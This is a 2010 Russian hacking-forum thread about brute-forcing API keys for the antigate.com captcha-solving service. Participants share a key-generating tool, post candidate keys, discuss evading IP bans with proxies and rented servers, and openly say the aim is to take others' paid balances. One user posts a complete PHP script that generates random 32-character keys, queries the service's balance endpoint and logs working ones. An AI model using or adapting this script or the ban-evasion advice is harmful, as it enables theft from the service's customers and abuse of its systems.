Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Bruteforce for Antigate.com (https://forum.antichat.xyz/showthread.php?t=188269)

FoXuk 19.03.2010 13:35
Bruteforce for Antigate.com
 
Она генерирует кеи для antigate.com и проверяет на валидность. Вероятность что получится сбрутить канешна минимальная…но все-таки)
http://i082.radikal.ru/1003/2b/1d5e4d40b065.png
Указываем количество потоков и жмем ‘Start’. Вот и все)

скачать с офф.сайта

yaneblinchik 19.03.2010 18:23
работает ли прога? попробывал чекать полученные гуды,ключ неверный
http://antigate.com/res.php?key=131bbeac1089ec8f7abf422053e3e860&action=get&id=CAPCHA_ID_HERE
Или я не так чекаю


И какой URL статистики распознавания капчи не подскажете на antigate.com?

Antonio Falkone 19.03.2010 18:27
Ключ верный.
Баланс - 0.0000

[iddqd] 19.03.2010 18:32
теперь "вебмастера" будут грабить не только лохов из ВК, но и друг друга!1

yaneblinchik 19.03.2010 18:32
А что на счет ID капчи? Я получаю только ключ брутфорсом, а ид какой брать? Или прога хлам без ида?

yaneblinchik 19.03.2010 18:34
К примеру несколько ключей))
d13bd41b9ea9142369a1b4cb2aac53d2
5642e0d0ee4b266e60836f9521de3d2e
d382be3c9b119ea16d7532205eaa2b0f
c8c04719040821c34c4641a725617e25
e4ae7137c41ea59a3a746459ae5b1620
Проверьте на валидность,если успеете можете и использовать. Но рабочие ли они,это плоды брута

Antonio Falkone 19.03.2010 18:37
Все ключи - ERROR_KEY_DOES_NOT_EXIST

yaneblinchik 19.03.2010 18:40
Antonio Falkone я о том же, мусор а не прожка!! или автор забыл про баги...

Antonio Falkone 19.03.2010 18:42
yaneblinchik укажи количество потоков и пробрученых ключей.

FHT 19.03.2010 18:51
Дык какой же это брут?
Это генератор, ну плюс проверка...
Но никак не брут...

yaneblinchik 19.03.2010 18:53
7 потоков,60 ключей O_o

FoXuk 19.03.2010 19:06
при 12 потоках так же 12 ключей, но ни один не работает

yaneblinchik 19.03.2010 19:08
странно,на офф сайте имеется версия в один поток,первое творение так скажем его. Может потестите?

Le_Comte 19.03.2010 19:13
Ерунда какая-то. Либо развелось много ключей на которых нет денег.

FoXuk 19.03.2010 19:13
отличие от первой только в многопоточности

yaneblinchik 19.03.2010 19:15
Да нет,эти ключи невалид,точнее их ваще не существует. Хотелось бы узнать как прога их подбирает...

*uNkN0Wn* 19.03.2010 19:18
Рандом. И это не ПОДБОР, это ГЕНЕРАЦИЯ ключей + проверка их на валидность.

Le_Comte 19.03.2010 19:21
Значит на валид тупо проверяет, хотя в принципе-то это осуществить не сложно, ответ с загруженной капчей либо приходит, либо ерор.

yaneblinchik 19.03.2010 19:22
не придирайтесь вы уже к словам,мне важна работает она или нет?

*uNkN0Wn* 19.03.2010 19:26
Работает. И при чем тут капча? Программа проверяет ключи по antigate.com/res.php?key=KEY&action=getbalance . С чего вы взяли капчи не понимаю.

FHT 19.03.2010 19:29
Цитата:
Сообщение от yaneblinchik
не придирайтесь вы уже к словам,мне важна работает она или нет?
Всем не важно, что важно тебе...
Работает. Но как это другой вопрос...

qwerra 19.03.2010 20:01
Запустил на 3-х дедах.пока полёт нулевой,будем посмотреть

qwerra 19.03.2010 20:09
Серфер со злого по теме скрипт написал http://forum.zloy.bz/showthread.php?t=104031

попугай 19.03.2010 20:17
а как она md5-кей генерит? Из каких данных?

*uNkN0Wn* 19.03.2010 20:18
Цитата:
Сообщение от попугай
а как она md5-кей генерит? Из каких данных?
Какая там генерация мд5)) Вы что. Тупо рандом.

yaneblinchik 20.03.2010 11:06
qwerraспс,
Цитата:
Серфер со злого по теме скрипт написал http://forum.zloy.bz/showthread.php?t=104031
теперь понял смысл....

З.Ы.Некоторые считают себя умными,и как правило умно разговаривают игнорируя заданный вопрос... флудеры))

qwerra 20.03.2010 16:17
Гуды есть у кого?
У меня наконец то дохрена гудов,но "...неправильный ключ антикапчи"

yaneblinchik 20.03.2010 16:54
писал выше,гудов уже под 80(щас проверял на деде)

Antonio Falkone 20.03.2010 17:01
Количество good не считал, было их достаточно, но
все ключи - ERROR_KEY_DOES_NOT_EXIST
Да и почему-то перебрало только ~1млн, а затем Stop.

mailbrush 20.03.2010 17:23
Цитата:
Сообщение от Антикаптча
your IP XXX.XXX.XXX.XXX blocked due to enormous activity (minimum 10000 requests with returning ERROR_WRONG_USER_KEY or ERROR_KEY_DOES_NOT_EXIST code)

Получили такое вот сообщение?
Это означает, что ваш софт сделал более 10к запросов за 1 час с айпи XXX.XXX.XXX.XXX, генерируя при этом ошибки ERROR_WRONG_USER_KEY и/или ERROR_KEY_DOES_NOT_EXIST . То есть пустые обращения в базу в огромном количестве, которые нагружают нашу систему. В этой связи наш софт автоматически включил этот айпи в фаервол на некоторое и выслал вам это сообщение. Дата разблокировки указывается там же.
Без прокси тут не обойтись...

qwerra 20.03.2010 17:28
Цитата:
Сообщение от yaneblinchik
писал выше,гудов уже под 80(щас проверял на деде)
Гудов то понятно,рабочие гуды? Правильный ключ?
С балансом есть?

yaneblinchik 20.03.2010 17:44
Скрипт для брута key"s antigate.com
PHP код:
Цитата:
<center><form method="POST">
Количество попыток:<input name="count" type="text" value="10"><br>
Файл для гудов:<input name="file" type="text" value="good.txt"><br>
<input type="submit" value="check"><br>
</form></center>

<?php
set_time_limit(0);

function add($path,$page_body)
{
$file=fopen($path,"a+");
fputs($file,$page_body);
fclose($file);
}



function gentext($count)
{
$simbols = array("1","2","3","4","5","6","7","8","9","0","a", "b","c","d","e","f");//символы из которых будет генерироваться кей
for($i=0;$i<$count;$i++)
{
$text .= $simbols[mt_rand(0,count($simbols)-1)];
}
return($text);
}

$goodfile = $_POST['file'];//файл для гудов
$count = $_POST['count'];//количество попыток для брута

if(!$goodfile||!$count)
{
echo 'Введите все даные';
exit;
}

for($i=0;$i<$count;$i++)
{
$key = gentext(32);
$result = file_get_contents("http://antigate.com/res.php?key=".$key."&action=getbalance");
if(strstr($result, "ERROR")=='')
{
echo $key." - good<br>";
add($goodfile, $key.":".$result."\r\n");
}
else
{
echo $key." - bad<br>";
}
flush();
}
?>
Скрипт для проверки баланса на конкретном key
php код:
Цитата:
<center><form method="POST">
KEY<input name="key" type="text" value=""><br>
<input type="submit" value="check"><br>
</form>
<?php
if($_POST['key']=='')exit;
echo file_get_contents("http://antigate.com/res.php?key=".$_POST['key']."&action=getbalance");
?>
</center>
На денвере запустил,поймал 1 ключ))баланс 1wmz

yaneblinchik 20.03.2010 17:47
qwerra нет гудов...не пойму почему(( но автор говорит это все вина в обрыве связи,и как говорили выше много запросов с одного ip,идет бан. А php скриптом мне скорее всего повезло щас нашел один гуд

Nomask 27.03.2010 23:22
А кто может пояснить резон етого всего?
я имею ввиду - ну допустим программа что то распознает...
Допустим она сгенерировала - чтото правильно...
Какой резон от етого человеку - который сидит и молится над ней - что бы она валидно сгенерировала... ?

Nomask 27.03.2010 23:25
Или ети "кей" - ето персональный идентификатор пользователя - который на счету держит сумму - для того что бы антигейт.ком (например) - разпознавал его капчи при спаме вконтакта (например)? - и спи-здив(валидно сгенерировав) такой кей - у тебя есть возможность обобрать ближнего своего?
Правильно я понимаю? :)

anthrax_ 28.03.2010 15:19
Nomask а ты только понял??? Это тоже самое что ты аси брутишь только тут вместо списка uin;pass прога генерирует ключик и проверяет его на антигейт.ком? если подошл то возможно там есть бабло, ну дальше думаю пояснять нет смысла!!!

winlogon.exe 30.03.2010 23:34
банится сразу же.. нужно с прокси брутить

S1ash 03.04.2010 23:14
я такой под новый год писал
за пару суток ничего не словил =(

drummashins 26.04.2010 23:42
на офф сайте выложена свежая версия, с прокси, и кнопкой стоп =)
запустил на дедике на 750 тысяч прочекал и поймал 1 =)

JeansSs 27.04.2010 00:23
банят ипы на раз


Время: 11:26
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице